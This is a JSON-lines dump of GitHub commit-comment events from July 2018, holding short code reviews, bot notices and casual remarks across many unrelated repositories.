{"id":"8006040097","type":"CommitCommentEvent","actor":{"login":"regisphilibert"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29805070,"position":null,"line":null,"path":null,"commit_id":"4270c5737a76ee18be77103d103828b769e25df5","created_at":"2018-07-23T19:48:15Z","updated_at":"2018-07-23T19:48:15Z","author_association":"OWNER","body":"Felt good @DirtyF! Only one tiny gulp plugin left for HTML minification... "}},"created_at":"2018-07-23T19:48:15Z"}
{"id":"8006045646","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29805086,"position":null,"line":null,"path":null,"commit_id":"56cfef3418ae0724efa6e8448dbe90274c0522e1","created_at":"2018-07-23T19:49:24Z","updated_at":"2018-07-23T19:49:24Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-265](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-265).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-265-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T19:49:24Z"}
{"id":"8006049766","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805097,"position":99,"line":99,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:50:15Z","updated_at":"2018-07-23T19:50:15Z","author_association":"NONE","body":"Нет ничего хуже чем неявные вещи, такие как [i-1][0]\r\nЕсли у тебя есть объект класса Route, который имеет массив станций, может сделать метод, который будет возвращать эти станции (геттер)? Потом ты сможешь пройтись по этому массиву методом each. И весь твой код займет всего 1-2 строчки"}},"created_at":"2018-07-23T19:50:15Z"}
{"id":"8006054749","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805114,"position":115,"line":115,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:51:19Z","updated_at":"2018-07-23T19:51:19Z","author_association":"NONE","body":"лишний пробел перед запятой 😄 "}},"created_at":"2018-07-23T19:51:19Z"}
{"id":"8006055541","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805115,"position":123,"line":123,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:51:29Z","updated_at":"2018-07-23T19:51:29Z","author_association":"NONE","body":"нет пробела после запятой 😄 "}},"created_at":"2018-07-23T19:51:29Z"}
{"id":"8006058035","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pip-feedstock"},"payload":{"comment":{"id":29805120,"position":null,"line":null,"path":null,"commit_id":"9d892348e5670324736ed45c5f33cb52812eb939","created_at":"2018-07-23T19:51:59Z","updated_at":"2018-07-23T19:51:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T19:51:59Z"}
{"id":"8006061874","type":"CommitCommentEvent","actor":{"login":"hellhaus"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29805126,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T19:52:44Z","updated_at":"2018-07-23T19:52:44Z","author_association":"NONE","body":"Nice project good Glück "}},"created_at":"2018-07-23T19:52:44Z"}
{"id":"8006062005","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805127,"position":5,"line":83,"path":"Gemfile","commit_id":"130d66576da60f1fe3a57c6f649c373163b266a0","created_at":"2018-07-23T19:52:46Z","updated_at":"2018-07-23T19:52:46Z","author_association":"NONE","body":"Versión de la gema"}},"created_at":"2018-07-23T19:52:46Z"}
{"id":"8006064057","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29805130,"position":null,"line":null,"path":null,"commit_id":"b51588a43fbc20a0966f747a2a5205ac6287e0e4","created_at":"2018-07-23T19:53:12Z","updated_at":"2018-07-23T19:53:12Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-3](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-msgu.pantheonsite.io/)"}},"created_at":"2018-07-23T19:53:12Z"}
{"id":"8006064418","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805133,"position":111,"line":111,"path":"railway_stations.rb","commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:53:17Z","updated_at":"2018-07-23T19:53:17Z","author_association":"NONE","body":"номер поезда должен храниться в самом поезде, а не в станции. Станция хранит только объекты (поезда), подходящая структура - массив"}},"created_at":"2018-07-23T19:53:17Z"}
{"id":"8006064480","type":"CommitCommentEvent","actor":{"login":"cwjnkins"},"repo":{"name":"astump/cedilleum-spec"},"payload":{"comment":{"id":29805134,"position":null,"line":null,"path":null,"commit_id":"d57226c0ed6de3282ba38b538e65d0b107e64f3e","created_at":"2018-07-23T19:53:18Z","updated_at":"2018-07-23T19:53:18Z","author_association":"COLLABORATOR","body":"@ernius I don't believe so. The fixpoint funtion **len** is defined for the type of the recursive occurrences Vec/len, but toVec/len has type Vec/len n -> Vec A n (that is, it reveals that Vec/len was really Vec A all along).\r\n\r\nPerhaps the naming convention is a bit confusing? I could see how someone would read it as to**-Vec/len**, but the intended reading was **toVec**/len"}},"created_at":"2018-07-23T19:53:18Z"}
{"id":"8006066200","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29805140,"position":null,"line":null,"path":null,"commit_id":"3a083e49b2e446a9eaa551e170d3f8b1e77bde10","created_at":"2018-07-23T19:53:39Z","updated_at":"2018-07-23T19:53:39Z","author_association":"NONE","body":"В общем нужен хороший рефакторинг кода 😄 "}},"created_at":"2018-07-23T19:53:39Z"}
{"id":"8006074783","type":"CommitCommentEvent","actor":{"login":"Pako7"},"repo":{"name":"brighanS/vclub"},"payload":{"comment":{"id":29805169,"position":14,"line":14,"path":"spec/support/capybara.rb","commit_id":"bf02e17a44d4588494b0e4c73f3b1b1035afaf26","created_at":"2018-07-23T19:55:23Z","updated_at":"2018-07-23T19:55:23Z","author_association":"NONE","body":"def submit_form! ; end"}},"created_at":"2018-07-23T19:55:23Z"}
{"id":"8006075758","type":"CommitCommentEvent","actor":{"login":"marioassis"},"repo":{"name":"marioassis/ProjetoDDD"},"payload":{"comment":{"id":29805174,"position":null,"line":null,"path":null,"commit_id":"af14fb2836abea1a3505efbcbda5a9fa11ec8884","created_at":"2018-07-23T19:55:35Z","updated_at":"2018-07-23T19:55:35Z","author_association":"OWNER","body":"Teste revertendo commit"}},"created_at":"2018-07-23T19:55:35Z"}
{"id":"8006077508","type":"CommitCommentEvent","actor":{"login":"Stratus3D"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29805179,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-23T19:55:56Z","updated_at":"2018-07-23T19:55:56Z","author_association":"CONTRIBUTOR","body":"I'm not sure exactly what you mean. What other method could we offer? I suppose we could install them ourselves, but then we would still need the same dependencies."}},"created_at":"2018-07-23T19:55:56Z"}
{"id":"8006086716","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"nunomaduro/larastan"},"payload":{"comment":{"id":29805208,"position":null,"line":null,"path":null,"commit_id":"84cd60fd17f191a631580ba20f2e76b76c0b3cb7","created_at":"2018-07-23T19:57:45Z","updated_at":"2018-07-23T19:57:45Z","author_association":"CONTRIBUTOR","body":"Thank you for your quick reaction."}},"created_at":"2018-07-23T19:57:45Z"}
{"id":"8006091028","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29805220,"position":null,"line":null,"path":null,"commit_id":"f8b67942875657c445e0f32565b316ace185f99d","created_at":"2018-07-23T19:58:40Z","updated_at":"2018-07-23T19:58:40Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-973](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-973).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-973-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T19:58:40Z"}
{"id":"8006091425","type":"CommitCommentEvent","actor":{"login":"marioassis"},"repo":{"name":"marioassis/ProjetoDDD"},"payload":{"comment":{"id":29805225,"position":null,"line":null,"path":null,"commit_id":"7ff7aec45668dabae8d9409d4bbef393f44b24c0","created_at":"2018-07-23T19:58:46Z","updated_at":"2018-07-23T19:58:46Z","author_association":"OWNER","body":"Recuperando"}},"created_at":"2018-07-23T19:58:46Z"}
{"id":"8006093047","type":"CommitCommentEvent","actor":{"login":"dal1a"},"repo":{"name":"megous/megatools"},"payload":{"comment":{"id":29805229,"position":null,"line":null,"path":null,"commit_id":"feb136b0b5dc13e1ab613ea9952faa0a49795d83","created_at":"2018-07-23T19:59:05Z","updated_at":"2018-07-23T19:59:05Z","author_association":"CONTRIBUTOR","body":"Hi, I noticed that with --chose-file option files are downloaded into a folder with the Mega root folder name, but without it they are downloaded straight into the current folder. This is a bit inconsistent, so I thought I'd let you know."}},"created_at":"2018-07-23T19:59:05Z"}
{"id":"8006096958","type":"CommitCommentEvent","actor":{"login":"andersy005"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29805242,"position":19,"line":17,"path":"condarecipe9.2/scripts/activate.d/cudatoolkit-dev-activate.sh","commit_id":"eb4d5befd4c9a9a4d67fd77e5b20093bbec5957b","created_at":"2018-07-23T19:59:52Z","updated_at":"2018-07-23T19:59:52Z","author_association":"COLLABORATOR","body":"How can I access `$PKG_VERSION` and `$PKG_NAME` every time I activate or deactivate a conda environment? I thought about it, but then got stuck while trying to figure this out. My understanding has been that after the package is built and installed, there is no way of accessing these environment variables. "}},"created_at":"2018-07-23T19:59:52Z"}
{"id":"8001302981","type":"CommitCommentEvent","actor":{"login":"celm1990"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29795047,"position":null,"line":null,"path":null,"commit_id":"762adedece1c6c2b97b282348659c1b39b988d24","created_at":"2018-07-23T02:01:59Z","updated_at":"2018-07-23T02:01:59Z","author_association":"CONTRIBUTOR","body":"Great feature, but lost two options:\r\n\r\n![image](https://user-images.githubusercontent.com/7775116/43053427-330c4b92-8df2-11e8-8c33-e8264572cf16.png)\r\n\r\nSome option or configuration for add pagebreak with new schema???"}},"created_at":"2018-07-23T02:01:59Z"}
{"id":"8001308881","type":"CommitCommentEvent","actor":{"login":"vaibhavp12345"},"repo":{"name":"LineageOS-eXtended/android_frameworks_base"},"payload":{"comment":{"id":29795048,"position":null,"line":null,"path":null,"commit_id":"00efcf5d8251ef94c44be1f94c1d8c7f4857ac2c","created_at":"2018-07-23T02:04:35Z","updated_at":"2018-07-23T02:04:35Z","author_association":"NONE","body":"Sir, please add three finger screenshot 🙂\r\n\r\nViperOS Commit\r\n\r\n1- https://github.com/Viper-Project/android_frameworks_base/commit/78874fae7f416c5cee2d282ef37698d15b07e9c8\r\n\r\n2- https://github.com/Viper-Project/android_frameworks_base/commit/8e2ad53fe03ae5515f9ab120ae891e1d100bd19a\r\n\r\n3- https://github.com/Viper-Project/android_packages_apps_Venom/commit/bfed1c5829adf340980483a5177447083947547b"}},"created_at":"2018-07-23T02:04:35Z"}
{"id":"8001310172","type":"CommitCommentEvent","actor":{"login":"monacoinproject"},"repo":{"name":"monacoinproject/monacoin"},"payload":{"comment":{"id":29795050,"position":null,"line":null,"path":null,"commit_id":"341db5e83f2dea0c5cf3dbc0421201efa09a1625","created_at":"2018-07-23T02:05:11Z","updated_at":"2018-07-23T02:05:11Z","author_association":"OWNER","body":"I think that it is better to have multiple means for placing Monacoin's checkpoints, so if you can use your idea, Monacoin's security will improve."}},"created_at":"2018-07-23T02:05:11Z"}
{"id":"8001314562","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29795126,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T02:06:57Z","updated_at":"2018-07-23T02:06:57Z","author_association":"NONE","body":"Congrats!  Very nice!"}},"created_at":"2018-07-23T02:06:57Z"}
{"id":"8001317456","type":"CommitCommentEvent","actor":{"login":"linus-dotdev"},"repo":{"name":"dotdevv/php-developer-assessment"},"payload":{"comment":{"id":29795130,"position":null,"line":null,"path":null,"commit_id":"5fc320b1caf856df47fe48338622d74c0897d2da","created_at":"2018-07-23T02:08:09Z","updated_at":"2018-07-23T02:08:09Z","author_association":"NONE","body":"@ivan-dotdev please split your commit, don't commit all changes in one commit"}},"created_at":"2018-07-23T02:08:09Z"}
{"id":"8001318700","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795132,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T02:08:42Z","updated_at":"2018-07-23T02:08:42Z","author_association":"NONE","body":"line 1963\r\n(#6.2) If the feature is disabled then I would say the AuditStatus for FTP Logon attempt restrictions should read OK?"}},"created_at":"2018-07-23T02:08:42Z"}
{"id":"8001322645","type":"CommitCommentEvent","actor":{"login":"darwinyip"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29795137,"position":49,"line":122,"path":"app/src/main/java/com/example/android/pets/EditorActivity.java","commit_id":"bea7d9080f06d447892c634f6271cb83eef9762b","created_at":"2018-07-23T02:10:31Z","updated_at":"2018-07-23T02:10:31Z","author_association":"NONE","body":"I'm getting `custom view has setOnTouchListener does not override performClick`."}},"created_at":"2018-07-23T02:10:31Z"}
{"id":"8001322903","type":"CommitCommentEvent","actor":{"login":"spanky69"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29795138,"position":9,"line":18,"path":"aio/content/guide/ngmodule-api.md","commit_id":"f1ab3942187b52effeb74aac9c5f242e94f812ca","created_at":"2018-07-23T02:10:39Z","updated_at":"2018-07-23T02:10:39Z","author_association":"NONE","body":"Ok now I know thank you "}},"created_at":"2018-07-23T02:10:39Z"}
{"id":"8001323357","type":"CommitCommentEvent","actor":{"login":"LazyRuning"},"repo":{"name":"LazyRuning/taiji"},"payload":{"comment":{"id":29795139,"position":null,"line":null,"path":null,"commit_id":"f6417bcfad0304ccfba265ecff42968fce95d3be","created_at":"2018-07-23T02:10:52Z","updated_at":"2018-07-23T02:10:52Z","author_association":"OWNER","body":"0"}},"created_at":"2018-07-23T02:10:52Z"}
{"id":"8001323530","type":"CommitCommentEvent","actor":{"login":"JeroenDeDauw"},"repo":{"name":"FAForever/FAPatch"},"payload":{"comment":{"id":29795140,"position":null,"line":null,"path":null,"commit_id":"62f9d5eb12502c10513f38460f6e720e18d9933b","created_at":"2018-07-23T02:10:57Z","updated_at":"2018-07-23T02:10:57Z","author_association":"NONE","body":"Haha. Nice naming"}},"created_at":"2018-07-23T02:10:57Z"}
{"id":"8001323656","type":"CommitCommentEvent","actor":{"login":"tarcianacbg"},"repo":{"name":"josemcast/IIIWorkshopMachineHandson"},"payload":{"comment":{"id":29795141,"position":null,"line":null,"path":null,"commit_id":"d045561e8ec3f3ede809c543198c6e3182fb6e20","created_at":"2018-07-23T02:11:00Z","updated_at":"2018-07-23T02:11:00Z","author_association":"COLLABORATOR","body":"Hands Ons de redes neurais"}},"created_at":"2018-07-23T02:11:00Z"}
{"id":"8001327380","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29795143,"position":null,"line":null,"path":null,"commit_id":"8e5e7c6b436e9a9722929f1b66abc9925ee7989c","created_at":"2018-07-23T02:12:45Z","updated_at":"2018-07-23T02:12:45Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-23T02:12:45Z"}
{"id":"8001333183","type":"CommitCommentEvent","actor":{"login":"qsmity"},"repo":{"name":"qsmity/Robofriends"},"payload":{"comment":{"id":29795155,"position":null,"line":null,"path":null,"commit_id":"5c85e885df1ab9da283a2dcc885c470ba7fcc3b8","created_at":"2018-07-23T02:15:20Z","updated_at":"2018-07-23T02:15:20Z","author_association":"OWNER","body":"adding updated files to make app interactive with react"}},"created_at":"2018-07-23T02:15:20Z"}
{"id":"8001338384","type":"CommitCommentEvent","actor":{"login":"MrCrayfish"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29795156,"position":35,"line":47,"path":"src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java","commit_id":"378f8d83028549c6bed8ef83a6629fabe9e64a38","created_at":"2018-07-23T02:17:40Z","updated_at":"2018-07-23T02:17:40Z","author_association":"OWNER","body":"My apologies, I will get this added"}},"created_at":"2018-07-23T02:17:40Z"}
{"id":"8001339731","type":"CommitCommentEvent","actor":{"login":"MrCrayfish"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29795157,"position":null,"line":null,"path":null,"commit_id":"dfe69d81c212f2c36817ddfc326a16283842d3ea","created_at":"2018-07-23T02:18:19Z","updated_at":"2018-07-23T02:18:19Z","author_association":"OWNER","body":"@barankaplan7878 What do you mean?"}},"created_at":"2018-07-23T02:18:19Z"}
{"id":"8001340717","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29795159,"position":null,"line":null,"path":null,"commit_id":"d7413d4149a5778f958907ee4b4fa40d5bd7cea7","created_at":"2018-07-23T02:18:45Z","updated_at":"2018-07-23T02:18:45Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2981 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-23T02:18:45Z"}
{"id":"8001343855","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795161,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T02:20:06Z","updated_at":"2018-07-23T02:20:06Z","author_association":"NONE","body":"line: 2376 \r\n(#7.10) The registry entry I on a (Windows 2016 _Datacenter_) differs slightly:  \r\n`[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Ciphers\\Triple DES 168]`\r\n\r\nMaybe unavoidable if there differences to Windows Server 2016"}},"created_at":"2018-07-23T02:20:06Z"}
{"id":"8001350570","type":"CommitCommentEvent","actor":{"login":"ajc113"},"repo":{"name":"ajc113/currents"},"payload":{"comment":{"id":29795167,"position":null,"line":null,"path":null,"commit_id":"bfd913c0d580216fe29ee05d865da32a6ceb859f","created_at":"2018-07-23T02:23:03Z","updated_at":"2018-07-23T02:23:03Z","author_association":"OWNER","body":"@rultor deploy"}},"created_at":"2018-07-23T02:23:03Z"}
{"id":"8001350926","type":"CommitCommentEvent","actor":{"login":"MindHunter86"},"repo":{"name":"MindHunter86/ks-installer"},"payload":{"comment":{"id":29795168,"position":45,"line":81,"path":"core/raft/raft.go","commit_id":"28369bbf3b341867282195a7f9e2c6ddcae89e37","created_at":"2018-07-23T02:23:11Z","updated_at":"2018-07-23T02:23:11Z","author_association":"OWNER","body":"Add return"}},"created_at":"2018-07-23T02:23:11Z"}
{"id":"8001369031","type":"CommitCommentEvent","actor":{"login":"ollieestuff"},"repo":{"name":"ollieestuff/madru-nerd"},"payload":{"comment":{"id":29795196,"position":null,"line":null,"path":null,"commit_id":"87b02d1ff6e74b546ade9e0b0314487351bd085c","created_at":"2018-07-23T02:30:57Z","updated_at":"2018-07-23T02:30:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Slider horizontal de vídeos (homepage)](https://trello.com/c/g6FYUt47/27-slider-horizontal-de-v%C3%ADdeos-homepage)"}},"created_at":"2018-07-23T02:30:57Z"}
{"id":"8001369332","type":"CommitCommentEvent","actor":{"login":"ollieestuff"},"repo":{"name":"ollieestuff/madru-nerd"},"payload":{"comment":{"id":29795197,"position":null,"line":null,"path":null,"commit_id":"bb73467ca086754b70d20469fc14fbefeea7fcd1","created_at":"2018-07-23T02:31:05Z","updated_at":"2018-07-23T02:31:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Slider horizontal de vídeos (homepage)](https://trello.com/c/g6FYUt47/27-slider-horizontal-de-v%C3%ADdeos-homepage)"}},"created_at":"2018-07-23T02:31:05Z"}
{"id":"8001369906","type":"CommitCommentEvent","actor":{"login":"ErekeEreke"},"repo":{"name":"ErekeEreke/iRide-Token"},"payload":{"comment":{"id":29795198,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T02:31:20Z","updated_at":"2018-07-23T02:31:20Z","author_association":"OWNER","body":"Super"}},"created_at":"2018-07-23T02:31:20Z"}
{"id":"8001375638","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795202,"position":null,"line":null,"path":null,"commit_id":"a0367f4e41f892edad0fab6fcb77e8e40040142f","created_at":"2018-07-23T02:33:42Z","updated_at":"2018-07-23T02:33:42Z","author_association":"NONE","body":"Can we move this to gitlab? Just open a new issue and copy/paste your commit there, I'll comment. Otherwise there's no way I'll find this discussion in the future... :)\r\n\r\n(also, after filing check the handling of the `ModelLenovoT450Touchpad` quirk, it's a similar issue that can provide a template)"}},"created_at":"2018-07-23T02:33:42Z"}
{"id":"8001381089","type":"CommitCommentEvent","actor":{"login":"lifeng5478"},"repo":{"name":"lifeng5478/YFSW1.0"},"payload":{"comment":{"id":29795206,"position":1,"line":1,"path":"README.md","commit_id":"14465d6ccffba0fc5ac349b011db60403308ee67","created_at":"2018-07-23T02:36:08Z","updated_at":"2018-07-23T02:36:08Z","author_association":"OWNER","body":"12121"}},"created_at":"2018-07-23T02:36:08Z"}
{"id":"8001383152","type":"CommitCommentEvent","actor":{"login":"tfbanks"},"repo":{"name":"tfbanks/Self_Paced-Online"},"payload":{"comment":{"id":29795211,"position":null,"line":null,"path":null,"commit_id":"3784528a24d223bf4155a0b90ff8247f3e587193","created_at":"2018-07-23T02:37:02Z","updated_at":"2018-07-23T02:37:02Z","author_association":"OWNER","body":"I updated some lesson 2 files to commit while trying to add lesson 3 slicing exercise, somehow all the changes I made in lesson 2 file was committed, but not my slicing exercise.  not sure what happened there.  I try to add and commit my slicing exercise and nothing happens.   will try that again later.   haven't had a problem before.\r\n\r\nI also noticed a delete comment from students/JerryH/Lesson02/README.rst that is added to this, I have not idea how that got in there or how to remove it so I'll just go forward with the commit; any insight on how may have happened will be helpful.  I didn't open that file or do anything with it."}},"created_at":"2018-07-23T02:37:02Z"}
{"id":"8001387455","type":"CommitCommentEvent","actor":{"login":"andybyte"},"repo":{"name":"andybyte/andybyte.github.io"},"payload":{"comment":{"id":29795218,"position":null,"line":null,"path":null,"commit_id":"fbf91b1a005d6c45a777afb302ae960e1af186a2","created_at":"2018-07-23T02:38:55Z","updated_at":"2018-07-23T02:38:55Z","author_association":"OWNER","body":"Trying out jekyll approach"}},"created_at":"2018-07-23T02:38:55Z"}
{"id":"8001394653","type":"CommitCommentEvent","actor":{"login":"qyhqyh"},"repo":{"name":"qyhqyh/week-1"},"payload":{"comment":{"id":29795226,"position":1,"line":1,"path":"myfile.txt/.swp","commit_id":"b665349faaf1529da7358a2469d53ece424352b9","created_at":"2018-07-23T02:42:08Z","updated_at":"2018-07-23T02:42:08Z","author_association":"OWNER","body":"hello myself"}},"created_at":"2018-07-23T02:42:08Z"}
{"id":"8001396310","type":"CommitCommentEvent","actor":{"login":"luhuilonghope"},"repo":{"name":"luhuilonghope/hello-world"},"payload":{"comment":{"id":29795227,"position":null,"line":null,"path":null,"commit_id":"4b2b2554eee34c0f2da953767108c6ff34942d49","created_at":"2018-07-23T02:42:52Z","updated_at":"2018-07-23T02:42:52Z","author_association":"OWNER","body":"pass2"}},"created_at":"2018-07-23T02:42:52Z"}
{"id":"8001399227","type":"CommitCommentEvent","actor":{"login":"ryan-andri"},"repo":{"name":"jyotiradityaJP/device_xiaomi_santoni"},"payload":{"comment":{"id":29795232,"position":15,"line":446,"path":"device.mk","commit_id":"18ee2416aff28c422a58e6771f5262d4cf248ec4","created_at":"2018-07-23T02:44:10Z","updated_at":"2018-07-23T02:44:10Z","author_association":"NONE","body":"remove this line, miss merge in here ;-)"}},"created_at":"2018-07-23T02:44:10Z"}
{"id":"8001400482","type":"CommitCommentEvent","actor":{"login":"royzhang2018"},"repo":{"name":"royzhang2018/hello-world"},"payload":{"comment":{"id":29795235,"position":null,"line":null,"path":null,"commit_id":"02ac850e3c1de6f05ee67f2f4c11665625c2ccb9","created_at":"2018-07-23T02:44:42Z","updated_at":"2018-07-23T02:44:42Z","author_association":"OWNER","body":"i like note python,halcon"}},"created_at":"2018-07-23T02:44:42Z"}
{"id":"8001400886","type":"CommitCommentEvent","actor":{"login":"ryan-andri"},"repo":{"name":"jyotiradityaJP/device_xiaomi_santoni"},"payload":{"comment":{"id":29795236,"position":17,"line":448,"path":"device.mk","commit_id":"18ee2416aff28c422a58e6771f5262d4cf248ec4","created_at":"2018-07-23T02:44:54Z","updated_at":"2018-07-23T02:44:54Z","author_association":"NONE","body":"also this seem duplicate line"}},"created_at":"2018-07-23T02:44:54Z"}
{"id":"8001402161","type":"CommitCommentEvent","actor":{"login":"Marcade80"},"repo":{"name":"HermanRonk/Clickfarm"},"payload":{"comment":{"id":29795242,"position":29,"line":29,"path":"back/resources.php","commit_id":"a02dd0ec0b0fcb7afa6ff3c5c6d77e9d56954342","created_at":"2018-07-23T02:45:26Z","updated_at":"2018-07-23T02:45:26Z","author_association":"CONTRIBUTOR","body":"twee strings? Lijkt me dat je voor Amount een Integer wil gebruiken?"}},"created_at":"2018-07-23T02:45:26Z"}
{"id":"8001402570","type":"CommitCommentEvent","actor":{"login":"MarcioCSantos"},"repo":{"name":"MarcioCSantos/Rainbow-Poem"},"payload":{"comment":{"id":29795244,"position":null,"line":null,"path":null,"commit_id":"f5df6dbe70bd5f3fee7963cec4c0171484edf4fe","created_at":"2018-07-23T02:45:36Z","updated_at":"2018-07-23T02:45:36Z","author_association":"OWNER","body":"adding unicorns to master"}},"created_at":"2018-07-23T02:45:36Z"}
{"id":"8001402646","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29795246,"position":36,"line":55,"path":"examples/mint-and-transfer.js","commit_id":"1d43c5249bbc848e94c648d57246412595f84c3a","created_at":"2018-07-23T02:45:39Z","updated_at":"2018-07-23T02:45:39Z","author_association":"CONTRIBUTOR","body":"Issue created: https://github.com/CodeChain-io/codechain-sdk-js/issues/85"}},"created_at":"2018-07-23T02:45:39Z"}
{"id":"8001403651","type":"CommitCommentEvent","actor":{"login":"surfer1036"},"repo":{"name":"RodrigoDLPontes/CodeU-Spring-2018"},"payload":{"comment":{"id":29795250,"position":null,"line":null,"path":null,"commit_id":"a8d505ad1b694732d2537fec154e6231fd9113ca","created_at":"2018-07-23T02:46:05Z","updated_at":"2018-07-23T02:46:05Z","author_association":"COLLABORATOR","body":"Everything looks good!"}},"created_at":"2018-07-23T02:46:05Z"}
